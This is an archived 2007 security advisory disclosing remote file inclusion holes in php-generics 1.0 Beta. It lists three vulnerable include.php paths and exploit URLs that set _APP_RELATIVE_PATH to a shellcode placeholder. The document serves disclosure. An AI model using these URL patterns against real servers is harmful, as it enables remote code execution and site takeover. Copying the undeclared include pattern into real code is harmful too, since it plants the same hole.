php-generics 1.0 Remote File Inclusion Vulnerabilities

2007-04-11T00:00:00
ID SECURITYVULNS:DOC:16667
Type securityvulns
Reporter Securityvulns
Modified 2007-04-11T00:00:00

Description

              --------------------------------------------------------


               php-generics 1.0 Remote File Inclusion Vulnerabilities

              --------------------------------------------------------

Software: php-generics 1.0Beta

Vendor: http://ie.archive.ubuntu.com/sourceforge/p/ph/php-generics/php-generics-1.0.0-beta.zip http://sourceforge.net/projects/php-generics/

Bugfounder: bd0rk

Vulnerable files: include.php, /dbcommon/include.php, /exception/include.php

[+]Exploit 1: http://[target]/[directory]/include.php?_APP_RELATIVE_PATH=[ShellCode]

[+]Exploit 2: http://[target]/[directory]/dbcommon/include.php?_APP_RELATIVE_PATH=[ShellCode]

[+]Exploit 3: http://[target]/[directory]/exception/include.php?_APP_RELATIVE_PATH=[ShellCode]

Problem: $_APP_RELATIVE_PATH is not declared before include_once and no configfile is aviable

Greetings: str0ke, TheJT, HaSSPappeL ;-)

Website1: www.soh-crew.it.tt

Website2: www.hackschool.dl.am

The 18 years old, german Hacker bd0rk

milw0rm.com [2007-04-05]